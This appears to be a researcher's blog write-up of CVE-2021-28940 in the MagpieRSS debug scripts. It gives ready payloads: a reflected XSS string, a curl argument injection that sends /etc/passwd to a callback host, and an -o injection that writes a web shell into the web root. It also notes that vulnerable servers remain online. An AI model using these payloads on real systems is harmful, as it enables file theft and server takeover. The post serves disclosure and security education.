This bug is an oldie, but one that is still about if you know where to look. It holds a special place in my heart as it was the first RCE I'd found on Synack, the fact it got rejected for being a duplicate doesn't matter!
CVE-2021-28940 is a particularly interesting one as the vulnerable scripts are intended for debug purposes only. By design they allow you to reach out and grab a webpage and its contents in order to parse it to provide the output of an RSS feed.
Below is a video of each of the points discussed later on:
As shown in the video, there are a few ways to exploit MagpieRSS. The easiest way is reflected XSS on the url and rss_url parameters depending on which of these three pages you are on magpie_debug.php, magpie_slashbox.php, or magpie_simple.php the payload is as simple as "><script>alert()</script>.
For SSRF, it's possible to trick the server to send a file to a location by appending --data, the parameter and payload would look like below:
?url=https://<burp.collab|webhook.site|other.callback> --data '@/etc/passwd'By doing this it's then possible to get the passwd file sent over. It's also possible to hit local ports on the machine (and network) in order to do a port scan.
The most interesting page is magpie_debug.php as it leaks the path to some of the includes which can then be used to guess the path serving webpages. This is important in the RCE scenario where it is possible to abuse curl in order to append -o to the running command in order to dump the contents of a webpage to the filesystem.
The full running command would be like below:
?url=https://<my.path.to/shell.txt>? -o /var/www/html/myshell.phpThe addition of the ? appears to be required based on this from the author. Very easy to exploit and surprisingly still on the Internet despite its age, you just need to know how to search for it. Worth adding the three pages to wordlists and bear in mind that depending on which page you are visiting will determine whether url or rss_url should be the parameter used.
Resources used:
